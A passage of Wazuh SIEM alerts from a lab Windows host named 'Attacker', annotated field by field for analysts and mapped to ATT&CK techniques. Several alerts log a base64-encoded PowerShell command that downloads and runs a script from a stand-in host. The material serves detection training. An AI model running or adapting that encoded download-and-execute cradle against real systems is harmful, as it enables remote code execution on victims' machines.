Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:52.372+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:52.372+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  95
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534392.1914008
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:50.5947163Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285521
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:49.622 ProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00} ProcessId: 4872 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00} ParentProcessId: 10488 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:49.622
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb5-680a-b50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdb3-680a-b30b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10488
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:53.382+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:53.382+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  99
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534393.1922075
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:50.7752700Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285522
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:50.758 ProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00} ProcessId: 4872 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rhjxvxaz.15p.ps1 CreationUtcTime: 2025-04-24 22:39:50.758 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:50.758
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb5-680a-b50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rhjxvxaz.15p.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:50.758
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:56.256+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:56.256+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  100
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534396.1924840
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:53.8734294Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285544
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:53.831 ProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00} ProcessId: 3664 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_nilkcvgi.iyi.ps1 CreationUtcTime: 2025-04-24 22:39:53.831 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:53.831
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb8-680a-b70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nilkcvgi.iyi.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:53.831
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:56.256+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:56.256+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  96
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534396.1927605
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:53.6430596Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285543
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:52.022 ProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00} ProcessId: 3664 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00} ParentProcessId: 4872 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:52.022
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb8-680a-b70b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdb5-680a-b50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

